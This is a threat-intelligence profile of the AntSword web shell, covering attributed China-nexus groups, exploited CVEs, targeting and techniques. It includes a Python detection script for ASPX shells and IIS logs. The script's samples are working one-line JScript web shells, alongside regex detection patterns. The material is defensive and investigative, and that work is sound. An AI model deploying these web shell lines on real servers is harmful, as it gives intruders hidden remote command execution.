AntSword
AntSword is an open-source Chinese web shell and web shell management framework used to manage compromised web servers and provide backdoor access. Public reporting describes it as similar to China Chopper: an operator runs the AntSword client on an attacker-controlled system and sends commands to a web shell on the compromised host, including through a virtual terminal. It has been observed deployed on IIS and other web servers after exploitation of internet-facing applications, including exposed phpMyAdmin instances, misconfigured web servers, Trimble Cityworks, and SharePoint (among the SharePoint cases, exploitation of CVE-2025-49706 and CVE-2025-53770). Reported post-compromise use includes command execution, persistence, lateral movement to additional hosts and SQL servers, and staging or exfiltration of data.
The tool has been associated in public reporting with multiple China-nexus intrusion sets and campaigns, including APT41/DUST, APT15, Cisco Talos-tracked UAT-6382, and Unit 42-tracked CL-UNK-1068. In these intrusions it was used alongside other web shells and malware such as China Chopper, Behinder, Godzilla, BLUEBEAM, Ghost RAT/Gh0st RAT, DUSTPAN, BEACON, FRP, and Xnote. Reported targeting includes local governing bodies in the United States, Middle Eastern government organizations, and organizations across the aviation, energy, government, law enforcement, pharmaceutical, technology, and telecommunications sectors in South, Southeast, and East Asia. Artifacts and behaviors reported with high confidence include AntSword web shells carrying English and Simplified Chinese messaging, operation through the AntSword Shell Manager or AntSword virtual terminal, and one AntSword variant deployed as bitreeview.aspx that base64-decoded the content of an HTTP POST parameter named Darr1R1ng and executed it via JScript eval. In one SharePoint case the AntSword web shell sample had SHA-256 15ecb6ac6c637b58b2114e6b21b5b18b0c9f5341ee74b428b70e17e64b7da55e.
Vulnerabilities exploited
4 CVEs correlated with this family across public research and vendor advisories.
Cisco Talos has observed exploitation of CVE-2025-0994, a remote-code-execution vulnerability in Cityworks, a popular asset management system. The Cybersecurity and Infrastructure Security Agency (CISA) and Trimble have both released advisories pertaining to this vulnerability... | Post-compromise activity involves the rapid deployment of web shells such as AntSword and chinatso/Chopper on the underlying IIS web servers.
Talos has found intrusions in enterprise networks of local governing bodies in the United States (U.S.), beginning January 2025 when initial exploitation first took place. UAT-6382 successfully exploited CVE-2025-0994, conducted reconnaissance and rapidly deployed a variety of web shells and custom-made malware to maintain long-term access.
Observed unknown threat actors exploiting a vulnerability in SharePoint described in CVE-2019-0604 to install several webshells on the website of a Middle East government organization... publicly available exploit code suggests that CVE-2019-0604 is still a major attack vector. | "One of these webshells is the open source AntSword webshell freely available on Github, which is remarkably similar to the infamous China Chopper webshell."
"...a signature trait of C2 tools like China Chopper or AntSword."
Groups observed using it
8 distinct threat actors attributed by public researchers.
Initial access facilitated by an internet-exposed phpMyAdmin panel enabled attackers to access the server SQL query interface and execute multiple SQL commands, resulting in the deployment of the ANTSWORD web shell.
Huntress said Nezha was used in tandem with other families of malware and web shell management tools, such as Ghost RAT and AntSword. One of the first clues leading them to attribute the incident to Chinese actors was that, upon accessing the administrative interface of the compromised system, the hacker set the language to simplified Chinese. Minton added that even though Huntress stopped short of formally attributing the campaign to a specific Chinese threat actor, the use of Ghost RAT and AntSword was a clue because they both have been used before in activity publicly attributed to Chinese APT groups.
Huntress reported attackers “gaining control of target servers via the AntSword web shell.”
"...moved to issue commands via AntSword’s virtual terminal. AntSword is an open-source Chinese web shell management framework... to manage compromised web servers."
Techniques & procedures
7 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access: 1 technique
Execution: 1 technique
Persistence: 1 technique
Discovery: 1 technique
Command and Control: 3 techniques
Each of these POST requests represents the attacker’s C2 server sending instructions to the compromised web server via the deployed web shell.
The access afforded by the ANTSWORD web shell is then used to run the "whoami" command to determine the privileges of the web server and deliver the open-source Nezha agent, which can be used to remotely commandeer an infected host by connecting to an external server
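The two observations above, that the shell variant evals a base64-decoded POST parameter and that each operator tasking arrives as a POST to the shell, suggest two hunts. The Python below is an added example and is not code from the page, from the cited vendors, or from the AntSword project: a source scanner that flags ASPX files which hand a request parameter (plain, or wrapped in FromBase64String) to JScript eval and recovers the parameter name, and an IIS W3C log hunt that surfaces script targets receiving repeated POSTs from one client. The bitreeview.aspx / Darr1R1ng pairing is the one the page cites; the other file names, IPs, user agents and log lines are constructed for illustration and are assumptions.

```python
"""
Added example (not from the page or the AntSword project): hunting an
AntSword-style ASPX web shell on disk and in IIS logs.
"""
import re
from collections import Counter

# eval( ... FromBase64String(Request[.Item|.Form|.Params]["<name>"] ...
B64_EVAL_RE = re.compile(
    r'eval\s*\(.*?FromBase64String\s*\(\s*Request(?:\.Item|\.Form|\.Params)?'
    r'\s*\[\s*["\']([^"\']+)["\']\s*\]',
    re.IGNORECASE | re.DOTALL,
)
# eval(Request[.Item|.Form|.Params]["<name>"], "unsafe")  (stock China Chopper / AntSword shape)
PLAIN_EVAL_RE = re.compile(
    r'eval\s*\(\s*Request(?:\.Item|\.Form|\.Params)?\s*\[\s*["\']([^"\']+)["\']\s*\]'
    r'\s*,\s*["\']unsafe["\']',
    re.IGNORECASE | re.DOTALL,
)


def scan_aspx_source(filename, source):
    """Return a finding dict for web-shell-like ASPX source, or None if nothing matched."""
    m = B64_EVAL_RE.search(source)
    if m:
        return {"file": filename, "param": m.group(1), "base64_wrapped": True}
    m = PLAIN_EVAL_RE.search(source)
    if m:
        return {"file": filename, "param": m.group(1), "base64_wrapped": False}
    return None


def parse_iis_w3c(lines):
    """Yield one dict per data line of an IIS W3C log, keyed by the #Fields header."""
    fields = None
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):          # #Software, #Version, #Date directives
            continue
        if fields is None:
            raise ValueError("data line before #Fields header")
        values = line.split()             # IIS writes spaces inside a field as '+'
        if len(values) == len(fields):    # skip truncated or malformed lines
            yield dict(zip(fields, values))


SCRIPT_EXT = (".aspx", ".ashx", ".asmx")


def hunt_iis_posts(lines, min_posts=3):
    """Group POSTs to script files by (client IP, URI); return groups at or above min_posts."""
    counts, anonymous, first_seen = Counter(), Counter(), {}
    for rec in parse_iis_w3c(lines):
        if rec.get("cs-method") != "POST":
            continue
        stem = rec.get("cs-uri-stem", "").lower()
        if not stem.endswith(SCRIPT_EXT):
            continue
        key = (rec.get("c-ip"), stem)
        counts[key] += 1
        first_seen.setdefault(key, rec.get("date", "") + " " + rec.get("time", ""))
        if rec.get("cs-username", "-") == "-":   # POST with no authenticated user behind it
            anonymous[key] += 1
    findings = [
        {"c_ip": ip, "uri": stem, "posts": n,
         "anonymous_posts": anonymous[(ip, stem)], "first_seen": first_seen[(ip, stem)]}
        for (ip, stem), n in counts.items() if n >= min_posts
    ]
    findings.sort(key=lambda f: (-f["posts"], f["uri"]))
    return findings


# --- constructed samples (assumed, for illustration only) -----------------------
SAMPLE_B64_SHELL = (
    '<%@ Page Language="Jscript"%><%eval(System.Text.Encoding.GetEncoding(65001)'
    '.GetString(System.Convert.FromBase64String(Request.Item["Darr1R1ng"])),"unsafe");%>'
)
SAMPLE_PLAIN_SHELL = '<%@ Page Language="Jscript"%><%eval(Request.Item["ant"],"unsafe");%>'
SAMPLE_BENIGN = '<%@ Page Language="C#" %><% Response.Write(Server.HtmlEncode(Request.QueryString["q"])); %>'

SAMPLE_IIS_LOG = r"""#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2025-07-21 03:14:07 10.0.0.5 GET /_layouts/15/start.aspx - 443 CORP\alice 10.0.0.77 Mozilla/5.0+(Windows+NT+10.0) https://sp.example.test/ 200 0 0 120
2025-07-21 03:14:09 10.0.0.5 POST /_layouts/15/start.aspx - 443 CORP\alice 10.0.0.77 Mozilla/5.0+(Windows+NT+10.0) https://sp.example.test/_layouts/15/start.aspx 200 0 0 210
2025-07-21 03:15:01 10.0.0.5 POST /_layouts/15/bitreeview.aspx - 443 - 203.0.113.9 Mozilla/5.0+(Windows+NT+10.0) - 200 0 0 48
2025-07-21 03:15:03 10.0.0.5 POST /_layouts/15/bitreeview.aspx - 443 - 203.0.113.9 Mozilla/5.0+(Windows+NT+10.0) - 200 0 0 52
2025-07-21 03:15:40 10.0.0.5 POST /_layouts/15/bitreeview.aspx - 443 - 203.0.113.9 Mozilla/5.0+(Windows+NT+10.0) - 200 0 0 61
"""

if __name__ == "__main__":
    for name, src in [("bitreeview.aspx", SAMPLE_B64_SHELL),
                      ("ant.aspx", SAMPLE_PLAIN_SHELL), ("ok.aspx", SAMPLE_BENIGN)]:
        print(name, "->", scan_aspx_source(name, src))
    for finding in hunt_iis_posts(SAMPLE_IIS_LOG.splitlines()):
        print(finding)
```

The source regexes are deliberately narrow: they match the eval-of-request-parameter construct rather than every file containing "eval", so a hit names the parameter an operator must send (useful for a Snort or WAF rule on the POST body). The log hunt keys on client IP plus script path because AntSword traffic is a series of POSTs to one file; raise or lower min_posts to fit the site's normal POST volume, and treat anonymous_posts equal to posts as the stronger signal on a site where legitimate POSTs carry a cs-username.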
IOCs tracked for this family
1 indicator attributed across vendor reports, sandbox runs, and researcher write-ups, in the file-hash category (MD5, SHA-1, SHA-256 values from samples and reports).
Recent activity
18 sources tracked across advisories, community write-ups, and news.
A web shell used by the Chinese threat cluster CL-UNK-1068 after initial compromise to move laterally to additional hosts and SQL servers.
Webshell used to maintain access and conduct post-exploitation actions such as lateral movement and data theft/exfiltration.
Web shell used for command execution and persistence on compromised web servers.
A web shell management tool used to control web shells on compromised servers and support post-exploitation operations.